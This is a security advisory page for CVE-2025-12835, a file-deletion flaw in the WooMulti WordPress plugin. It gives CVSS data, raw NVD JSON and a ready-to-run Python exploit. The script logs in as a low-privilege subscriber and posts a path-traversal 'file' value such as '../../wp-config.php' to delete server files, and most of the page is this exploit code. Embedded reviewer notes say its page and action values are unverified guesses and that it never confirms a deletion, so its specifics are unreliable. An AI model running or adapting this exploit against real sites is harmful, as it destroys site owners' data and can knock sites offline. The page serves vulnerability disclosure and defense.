Security Vulnerability Report
CVE-2025-12835 CVSS 7.3 HIGH

CVE-2025-12835

Published: 2025-12-12 11:15:50
Last Modified: 2026-04-15 00:35:42

Description

The WooMulti WordPress plugin through version 17 does not validate a file parameter when deleting files, which could allow any authenticated user, such as a subscriber, to delete arbitrary files on the server.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WooMulti WordPress Plugin <= 17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
from urllib.parse import urlencode  # NOTE(review): imported but never used below
# CVE-2025-12835 PoC - WooMulti Plugin Arbitrary File Delete
# Author: Security Researcher
# Note: This is for educational purposes only
#
# Reviewer notes on this listing (as published on the page):
# - The advisory text above only states that a "file" parameter is not validated
#   when the plugin deletes files. The specific `page` and `action` values used in
#   exploit_arbitrary_file_delete() are not corroborated anywhere on this page;
#   treat them as the PoC author's assumption, not as advisory fact.
# - Nothing in this script verifies that a file was actually removed; it reports
#   the HTTP status code only.
# - From a defender's side, the request shape is a low-privilege authenticated
#   POST to /wp-admin/admin.php carrying a path in a `file` parameter; that is the
#   pattern to look for in access logs / WAF telemetry. The root cause is missing
#   server-side validation of that parameter (an allow-list of deletable files
#   would close it). A fixed plugin release is not stated on this page.

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"  # Low privilege account
PASSWORD = "password123"


def get_wordpress_nonce(login_url: str) -> dict:
    """Fetch the login page and return its cookies as a plain dict.

    NOTE(review): despite the name, no nonce is extracted here -- the function
    only GETs ``login_url`` (10 s timeout) and returns the response cookie jar
    converted with ``get_dict()``.
    """
    response = requests.get(login_url, timeout=10)
    return response.cookies.get_dict()


def authenticate(login_url: str, username: str, password: str, cookies: dict):
    """POST the standard wp-login.php form and return the response cookies.

    The cookies obtained from get_wordpress_nonce() are sent along with the
    form. Redirects are followed. Whether the login actually succeeded is not
    checked -- the cookie jar is returned regardless of the outcome.
    """
    auth_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    # NOTE(review): no timeout is passed here, unlike the GET above.
    response = requests.post(login_url, data=auth_data, cookies=cookies, allow_redirects=True)
    return response.cookies


def exploit_arbitrary_file_delete(target_url: str, auth_cookies, file_path: str) -> requests.Response:
    """
    Exploit WooMulti plugin arbitrary file deletion
    file_path: Relative or absolute path to file to delete
    Example: ../../wp-config.php or /etc/passwd (if permissions allow)

    Returns the ``requests.Response`` of the POST. A 200 status is only
    reported as "request sent"; the function does not (and cannot, from the
    status code alone) confirm that anything was deleted.
    """
    exploit_url = f"{target_url}/wp-admin/admin.php"
    # Construct the malicious request
    # NOTE(review): the `page` and `action` values below are not stated in the
    # advisory on this page -- unverified assumption of the PoC author.
    exploit_data = {
        'page': 'woomulti-settings',  # Plugin page
        'action': 'delete_file',  # Delete action
        'file': file_path  # Arbitrary file path (vulnerability point)
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Referer': exploit_url
    }
    print(f"[*] Sending delete request for: {file_path}")
    # NOTE(review): no timeout is passed here either.
    response = requests.post(exploit_url, data=exploit_data, cookies=auth_cookies, headers=headers)
    if response.status_code == 200:
        # 200 here means the page was served, not that the deletion happened.
        print(f"[+] Request sent successfully")
        print(f"[*] Check if {file_path} was deleted")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
    return response


def main() -> None:
    """Command-line entry point: ``<target_url> <file_to_delete>``.

    Exits with status 1 when fewer than two arguments are given. Credentials
    come from the hard-coded USERNAME / PASSWORD constants, not from argv.
    """
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12835.py <target_url> <file_to_delete>")
        print("Example: python cve-2025-12835.py http://example.com ../../wp-config.php")
        sys.exit(1)
    target_url = sys.argv[1].rstrip('/')  # trailing slash stripped so the f-strings below don't double it
    file_to_delete = sys.argv[2]
    login_url = f"{target_url}/wp-login.php"
    print("[*] CVE-2025-12835 - WooMulti Plugin Arbitrary File Delete")
    print("[*] Target:", target_url)
    print("[*] File to delete:", file_to_delete)
    # Step 1: Get initial cookies (see note on get_wordpress_nonce: no nonce involved)
    cookies = get_wordpress_nonce(login_url)
    # Step 2: Authenticate (login result is not verified)
    print("[*] Authenticating as subscriber user...")
    auth_cookies = authenticate(login_url, USERNAME, PASSWORD, cookies)
    # Step 3: Exploit (return value is discarded; only the prints report the outcome)
    print("[*] Exploiting...")
    exploit_arbitrary_file_delete(target_url, auth_cookies, file_to_delete)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12835", "sourceIdentifier": "[email protected]", "published": "2025-12-12T11:15:50.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooMulti WordPress plugin through 17 does not validate a file parameter when deleting files, which could allow any authenticated users, such as subscriber to delete arbitrary files on the server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "references": [{"url": "https://wpscan.com/vulnerability/1650ddac-04c7-47fa-b03e-bd0338243fcc/", "source": "[email protected]"}]}}